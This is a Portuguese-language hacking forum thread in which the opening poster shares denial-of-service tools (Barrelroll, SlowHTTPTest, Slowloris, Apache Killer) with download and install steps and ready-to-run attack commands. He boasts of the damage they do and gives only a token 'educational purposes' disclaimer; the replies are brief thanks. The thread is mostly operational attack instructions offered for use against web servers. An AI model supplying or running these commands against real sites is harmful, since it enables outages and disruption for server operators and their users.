Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Ferramentas usadas para ataque de "NEGAÇÃO DE SERVIÇO" DOS/DDOS

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tools Ferramentas usadas para ataque de "NEGAÇÃO DE SERVIÇO" DOS/DDOS

    Como eu tenho muito tempo que não posto nada aqui, resolvir postar algumas ferramentas que eu venho usando e obtendo bons resultados com ataque de negação de serviço Denial of service.
    Bom, pode ser que a maioria aqui já conheça 90% das ferramentas, pode ter certeza que tem gente também que não. É um tutorial básico, onde vou postar o download das ferramentas e eventualmente fazer um mini tutorial de como usa-las.
    Vale ressaltar que todas foram testadas no linux por mim BT5, todas tive bom resultadonão significa que será da mesma forma com vocês, chega de conversa vamos lá.

    Barrelroll: Pycurl DDoS Tool!

    A Barrelroll realiza múltiplas conexões em um host utilizando múltiplos proxies.
    Foi desenvolvida em Python. Foi lançada a pouco tempo e pode fazer um bom estrago em seus ataques...

    COMO USAR:

    Código:
    ./barrelroll.py IPAQUI exemplo.com 50 < proxies/list1.txt
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Slowhttptest

    SlowHTTPTest é uma ferramenta altamente configurável, que tem a capacidade de simular alguns ataques Layer Application DoS (Denial of Service).
    Ela pode lidar com ate 64.000 conexões simultâneas, o que a torna super eficiente.
    Vale lembrar que seu uso é exclusivo para testes em servidores APACHE.

    COMO USAR

    Para baixar e descompactar SlowHTTPTest:

    Código:
    wget http://slowhttptest.googlecode.com/files/slowhttptest-1.4.tar.gz
    gunzip slowhttptest-1.4.tar.gz
    tar xf slowhttptest-1.4.tar.gz
    cd slowhttptest-1.4
    Instalar:

    Código:
    ./configure
    make
    make install
    Usar:

    Código:
    slowhttptest -c 1000 -B -g -o output-file-name -i 100 -r 300 -s 10240 -u http://www.example.com/url/page.html -x 20
    Slowloris HTTP DoS

    O Slowloris é uma ferramenta de HTTP DoS desenvolvida pelo Rsnake. Seu funcionamento é bastante interessante porque ele cria sockets e envia requisições HTTPs válidas para a vitima continuamente em intervalos regulares, dessa forma ele tenta enganar o webserver evitando que estas conexões sejam fechadas.

    No seu linux, vocês irão precisar executar o comando

    Código:
    cpan Parallel::ForkManager
    COMO USAR

    Depois de ter baixado o script, abra o terminal de digite:

    Código:
    perl slowloris.pl -dns example.com
    Outros exemplos:

    Slowloris faz evitar cache de apoio em uma base experimental com a opção de cache. Alguns servidores de cache pode olhar para a parte do caminho pedido do cabeçalho, mas enviando pedidos diferentes a cada vez que você pode abusar de mais recursos. A utilidade desta opção especial, não foi exaustivamente testado. Sua milhagem pode variar.

    head3 HTTP Cache Exemplo:

    Código:
    ./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache
    Enviando mensagem para o servidor:

    Código:
    ./slowloris.pl -dns www.example.com -port 80 -test
    Sistemas afetados:

    Apache 1.x
    Apache 2.x
    dhttpd
    GoAhead WebServer
    Squid

    Servidores Web que isto não afeta:

    IIS6.0
    IIS7.0
    lighttpd
    nginx
    Cherokee (verified by user community)

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Apache Killer

    O Apache Killer foi uma vulnerabilidade divulgada no meio de agosto do ano passado que deixou muito administrador Web de cabelos em pé e não é para menos já que Apache corresponde em mais de 60% dos servidores HTTP que rodam na Internet.

    COMO USAR:

    Código:
    perl killapache.pl www.example.com 50
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Adicionem a linha

    #!/usr/bin/perl

    logo no início do script.

    No seu linux, vocês irão precisar executar o comando:

    Código:
    cpan Parallel::ForkManager
    Bom é isso ai, não saiam atacando servidores aleatorios que vocês podem ser presos...Não me responsabiliz pelo mau uso das ferramentas. Esse tutorial foi feito para fins educativos. OBRIGADO!

    USEM LINUX!
    Similar Threads

  • Font Size
    #2
    Valeu Man Muito Bom Msmo

    Comment


    • Font Size
      #3
      Pena que eu não entendo nada desses códigos. Um dia entenderei mas até la..
      é melhor estudar.

      Comment


      • Font Size
        #4
        Muito bom, valeu..

        Comment


        • Font Size
          #5
          Postado Originalmente por srnemesis Ver Post
          Pena que eu não entendo nada desses códigos. Um dia entenderei mas até la..
          é melhor estudar.
          cara mude para linux que vc começara a intender =)

          Comment

          X
          Working...
          X